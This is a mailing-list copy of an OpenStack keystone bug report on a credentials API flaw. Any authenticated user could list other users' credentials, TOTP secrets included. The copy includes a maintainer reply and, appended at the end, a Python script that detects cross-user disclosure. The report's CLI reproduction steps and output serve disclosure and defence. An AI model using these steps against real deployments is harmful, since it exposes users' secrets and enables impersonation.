[Bug 1855080] Re: Credentials API allows listing and retrieving of all users credentials

Gage Hugo gagehugo at gmail.com
Mon Dec 9 16:24:48 UTC 2019


I wasn't able to recreate this with Rocky; only a user with the "admin"
role was able to list credentials, and other users with member roles were
denied (as policy defined).

The code was indeed changed after Rocky to account for system scope,
where I believe that this issue was introduced.

https://bugs.launchpad.net/bugs/1855080

Title:
  Credentials API allows listing and retrieving of all users credentials

Status in OpenStack Identity (keystone):
  Fix Released
Status in OpenStack Security Advisory:
  Confirmed
Status in keystone package in Ubuntu:
  New

Bug description:
  Tested against Stein and Train.

  # User creating a credential, i.e totp or similar
  $ OS_CLOUD=1 openstack token issue
  | project_id | c3caf1b55bb84b78a795fd81838e5160
  | user_id    | 9971b0f13d2d4a578212d028a53c3209
  $ OS_CLOUD=1 openstack credential create --type test 9971b0f13d2d4a578212d028a53c3209 test-data
  $ OS_CLOUD=1 openstack credential list
  +----------------------------------+------+----------------------------------+-----------+------------+
  | ID                               | Type | User ID                          | Data      | Project ID |
  +----------------------------------+------+----------------------------------+-----------+------------+
  | 0a3a2d3b7dad4886b0bbf61b6cd7d2b0 | test | 9971b0f13d2d4a578212d028a53c3209 | test-data | None       |
  +----------------------------------+------+----------------------------------+-----------+------------+

  # Different User but same Project
  $ OS_CLOUD=2 openstack token issue
  | project_id | c3caf1b55bb84b78a795fd81838e5160
  | user_id    | 6b28a0b073fc4ac7843f33190ebc5c3c
  $ OS_CLOUD=2 openstack credential list
  +----------------------------------+------+----------------------------------+-----------+------------+
  | ID                               | Type | User ID                          | Data      | Project ID |
  +----------------------------------+------+----------------------------------+-----------+------------+
  | 0a3a2d3b7dad4886b0bbf61b6cd7d2b0 | test | 9971b0f13d2d4a578212d028a53c3209 | test-data | None       |
  +----------------------------------+------+----------------------------------+-----------+------------+

  # Different User and Different Project
  $ OS_CLOUD=3 openstack token issue
  | project_id | d43f20ae5a7e4f36b701710277384401
  | user_id    | 2e48f1a7d1474391a826a2b9700e5949
  $ OS_CLOUD=3 openstack credential list
  +----------------------------------+------+----------------------------------+-----------+------------+
  | ID                               | Type | User ID                          | Data      | Project ID |
  +----------------------------------+------+----------------------------------+-----------+------------+
  | 0a3a2d3b7dad4886b0bbf61b6cd7d2b0 | test | 9971b0f13d2d4a578212d028a53c3209 | test-data | None       |
  +----------------------------------+------+----------------------------------+-----------+------------+

  As shown anyone who's authenticated can retrieve any credentials
  including their 'secret'.

  This is a rather severe information disclosure vulnerability and
  completely defies the purpose of TOTP or MFA as these credentials are
  not kept secure or private whatsoever.

  If auth rules are configured to allow login with only 'totp', it would be
  extremely easy to assume a different user's identity.

  A CVE should be issued for this. I can take care of that paperwork.

  Versions affected and tested:

  Train/ubuntu:
  $ dpkg -l | grep keystone
  ii  keystone                             2:16.0.0-0ubuntu1~cloud0                                    all          OpenStack identity service - Daemons
  ii  keystone-common                      2:16.0.0-0ubuntu1~cloud0                                    all          OpenStack identity service - Common files
  ii  python-keystoneauth1                 3.13.1-0ubuntu1~cloud0                                      all          authentication library for OpenStack Identity - Python 2.7
  ii  python-keystoneclient                1:3.19.0-0ubuntu1~cloud0                                    all          client library for the OpenStack Keystone API - Python 2.x
  ii  python-keystonemiddleware            6.0.0-0ubuntu1~cloud0                                       all          Middleware for OpenStack Identity (Keystone) - Python 2.x
  ii  python3-keystone                     2:16.0.0-0ubuntu1~cloud0                                    all          OpenStack identity service - Python 3 library
  ii  python3-keystoneauth1                3.17.1-0ubuntu1~cloud0                                      all          authentication library for OpenStack Identity - Python 3.x
  ii  python3-keystoneclient               1:3.21.0-0ubuntu1~cloud0                                    all          client library for the OpenStack Keystone API - Python 3.x
  ii  python3-keystonemiddleware           7.0.1-0ubuntu1~cloud0                                       all          Middleware for OpenStack Identity (Keystone) - Python 3.x

  Stein/RHEL:
  $ rpm -qa | grep keystone
  python3-keystoneclient-3.19.0-0.20190312070330.6c4bb8b.el8ost.noarch
  openstack-keystone-15.0.1-0.20190720060412.5f27c4b.el8ost.noarch
  python3-keystoneauth1-3.13.1-0.20190311052414.bde07bc.el8ost.noarch
  python3-keystonemiddleware-6.0.0-0.20190312071144.fca37ea.el8ost.noarch
  python3-keystone-15.0.1-0.20190720060412.5f27c4b.el8ost.noarch

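The reproduction above is easy to turn into an automated check: run `openstack credential list` as a low-privilege user and flag every row whose User ID is not the caller's own. The script below is an added example written for this page, not keystone's code or the reporter's. It parses the ASCII table the CLI prints (the sample table is copied from the OS_CLOUD=2 run above) and flags foreign rows; it also models, as an assumption about the intended policy rather than a statement of what the fix does, the server-side filter implied by the reply (an admin with system scope may list everyone's credentials; any other caller only sees their own).

```python
"""Cross-user credential disclosure check for bug 1855080.

Added example, not keystone project code. Assumptions are marked below.
"""
from dataclasses import dataclass
from typing import Dict, FrozenSet, List

# Constructed sample: the table printed for OS_CLOUD=2 (user 6b28...) in the
# report above. On a live cloud, capture `openstack credential list` instead.
SAMPLE_LIST_OUTPUT = """\
+----------------------------------+------+----------------------------------+-----------+------------+
| ID                               | Type | User ID                          | Data      | Project ID |
+----------------------------------+------+----------------------------------+-----------+------------+
| 0a3a2d3b7dad4886b0bbf61b6cd7d2b0 | test | 9971b0f13d2d4a578212d028a53c3209 | test-data | None       |
+----------------------------------+------+----------------------------------+-----------+------------+
"""


def parse_cli_table(text: str) -> List[Dict[str, str]]:
    """Parse the default cliff ASCII table into a list of {header: cell} dicts."""
    rows: List[Dict[str, str]] = []
    header = None
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("|"):
            continue  # '+----+' border lines and blank lines carry no data
        cells = [c.strip() for c in line.strip("|").split("|")]
        if header is None:
            header = cells  # first '|' line is the column header
            continue
        rows.append(dict(zip(header, cells)))
    return rows


def disclosed_credentials(list_output: str, caller_user_id: str) -> List[Dict[str, str]]:
    """Rows the caller can see that belong to someone else.

    A non-empty result from a non-admin, project-scoped caller means the
    listing is not scoped to the requesting user, i.e. this bug is present.
    """
    return [r for r in parse_cli_table(list_output) if r["User ID"] != caller_user_id]


@dataclass(frozen=True)
class Caller:
    """Minimal view of the token used to call the API (hypothetical model)."""
    user_id: str
    roles: FrozenSet[str]
    system_scope: bool = False


def visible_credentials(caller: Caller, all_credentials: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Server-side filter as the intended behaviour is described in the reply.

    ASSUMPTION: only an admin acting with system scope may enumerate every
    user's credentials; everyone else is restricted to their own user_id.
    The real keystone policy rule may differ in detail.
    """
    if caller.system_scope and "admin" in caller.roles:
        return list(all_credentials)
    return [c for c in all_credentials if c["User ID"] == caller.user_id]


if __name__ == "__main__":
    me = "6b28a0b073fc4ac7843f33190ebc5c3c"  # user 2 from the report
    for row in disclosed_credentials(SAMPLE_LIST_OUTPUT, me):
        print("DISCLOSED:", row["ID"], "owned by", row["User ID"], "data:", row["Data"])
```

On a live deployment, capture the listing with the low-privilege credentials (`openstack credential list` with the same OS_CLOUD as in the report) and pass the text to `disclosed_credentials` with that user's ID; any row returned is a credential that user should never have been able to read. Because the Data column is the credential blob itself, a leaked TOTP or EC2-style entry is immediately usable, which is why listing must be filtered by user on the server rather than hidden in a client.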